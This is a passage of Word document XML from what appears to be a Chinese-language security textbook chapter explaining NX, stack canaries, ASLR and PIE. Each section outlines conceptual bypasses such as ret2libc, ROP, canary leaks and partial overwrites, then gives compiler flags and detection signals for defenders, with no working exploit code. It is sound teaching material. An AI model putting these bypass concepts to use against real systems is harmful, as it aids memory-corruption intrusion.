      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">既然不能执行注入的代码，攻击者便会转向复用现有代码——这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ret2libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ROP（Return-Oriented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Programming）的核心思想。攻击者在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或其他可执行内存中寻找有用的代码片段（gadget），通过覆盖返回地址将这些片段串联起来达到恶意目的（如调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/sh")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。此绕过不注入任何新代码，而是利用已存在且处于可执行内存中的指令。本书仅在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中给出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ret2libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的概念，绝不提供可武器化的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链构造细节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御启示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅靠</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不足以阻止代码复用攻击，但它是现代防御体系的第一道屏障。在编译时启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">NX（GNU/Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-z noexecstack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链接选项，Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/NXCOMPAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），可确保可执行文件的栈和堆不具备执行权限①。从蓝队视角看，任何因尝试在不可执行内存中执行指令而产生的异常（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核日志中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">segfault at ... ip ... error 4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">事件日志中的访问违规）都应被采集，并作为潜在攻击迹象进行监控。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="265"/>
    <w:bookmarkStart w:id="266" w:name="栈-canary返回地址前的监测值"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Canary：返回地址前的监测值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一种编译器插桩防御技术，其名源于矿井中的“金丝雀”（canary），用于提前预警危险。在函数序言中，编译器在栈帧中紧邻保存的返回地址（及老的栈帧指针）之前放置一个随机生成的、难以预测的值，即“canary”。在函数返回前，编译器插入的代码会检查该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值是否与程序启动时生成的原始副本一致①。如果栈缓冲区溢出是顺序向高地址覆盖（由局部变量向返回地址蔓延），则在修改返回地址之前必然先覆盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">canary；返回前的检查发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被篡改后，会立即调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__stack_chk_fail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数终止程序，从而阻断控制流劫持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">它把什么假设变难？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者假设覆盖返回地址的操作对正常的函数返回流程是“不可见”的。Canary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接在返回地址前插入了一个必须被精确保持的哨兵值。要绕过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">canary，攻击者必须要么泄露该随机值（但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开头以阻止字符串泄露），要么能够实现非线性的、仅覆盖返回地址而不触碰</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的写操作（这在连续的栈缓冲区溢出中几乎不可能）①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绕过概念（仅示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的绕过往往依赖信息泄露：如果攻击者能通过格式化字符串漏洞或其他方式读取栈内存，就可能获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值，并在构造溢出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时原样填入，使检查通过。另外，某些非连续写（如通过索引误用直接改写返回地址）也可能避开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">canary，但这在典型的线性溢出中不适用。这些绕过需要额外的漏洞组合，极大增加了攻击的复杂性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御启示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代编译器默认开启了栈保护，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GCC/Clang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fstack-protector-strong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fstack-protector-all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①。蓝队在分析崩溃样本或程序行为时，若看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__stack_chk_fail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关的函数调用或错误消息，应将其视为遭到栈缓冲区溢出攻击的高度可靠信号，并触发应急响应流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="266"/>
    <w:bookmarkStart w:id="267" w:name="aslr地址空间布局随机化"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR：地址空间布局随机化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ASLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Space Layout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Randomization）是现代操作系统提供的一项运行时防御机制。它在每次加载进程时，对进程地址空间中关键区域的基址施加随机偏移，包括栈、堆、动态链接库（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">libc）的加载位置，以及某些情况下可执行文件本身的加载位置（如果搭配了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE）①。具体的随机化熵取决于体系结构和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置，但即使只有几个位的偏移，也足以让“硬编码的绝对地址”失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">它把什么假设变难？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者假设能够事先知道关键内存对象的地址（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数的地址，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链的第一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址）。ASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使得这些地址在每次运行时都不可预测。若没有可靠的信息泄露，攻击者便无法复用代码段中的有用指令，因为连指令（gadget）在哪里都不知道①。这是对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ret2libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等代码复用攻击的直接削弱。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ret2libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">概念中，我们曾假定已知的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址——那是在无</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境下成立的教学情境。真实系统中，ASLR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">令这一前提极难满足。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的实现依赖于虚拟内存的页表管理，其基础已在《从位到物联》Ch16（虚拟内存/页表）中阐述，这里直接应用：操作系统在创建进程地址空间时，对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基址、栈起点等施加随机偏移，并由页表维护这些随机映射关系①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绕过概念（仅示意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者必须首先通过独立的漏洞（如信息泄露）获取某个库函数的运行时地址，以此推算整个库的基址；或者在一些特殊场景下，利用部分覆盖（只覆盖地址的低字节，因为低字节可能未随机化或随机化不足）来调整返回地址。这些技术都需要额外条件，且许多现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已增加了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的熵值并引入了更严格的随机化策略（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">randomize_va_space=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="267"/>
    <w:bookmarkStart w:id="268" w:name="pie位置无关可执行文件"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE：位置无关可执行文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Position-Independent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Executable）是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在可执行文件自身的延伸。传统上，即使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ASLR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已开启，主程序的代码段（.text）通常仍被加载到固定地址（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x08048000），因为可执行文件是以非位置无关的方式编译的。这就为攻击者留出了一块“安全港湾”：即便库地址随机化，主程序的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址仍然是已知的，利用主程序自身的代码片段仍可发起攻击①。采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PIE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编译的可执行文件则像共享库一样，其所有段（包括代码段和数据段）在加载时都可以被放置在随机基址上，从而消除这一片最后的已知地址孤岛。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">它把什么假设变难？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者假设主程序的代码段地址是固定的，可以作为构建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链的可靠原料。PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使得主程序中的所有指令地址也变得随机化，同样需要信息泄露才能确定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的位置①。这进一步缩小了代码复用攻击的可用面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PIE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只需在编译和链接时加上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-fPIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-pie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
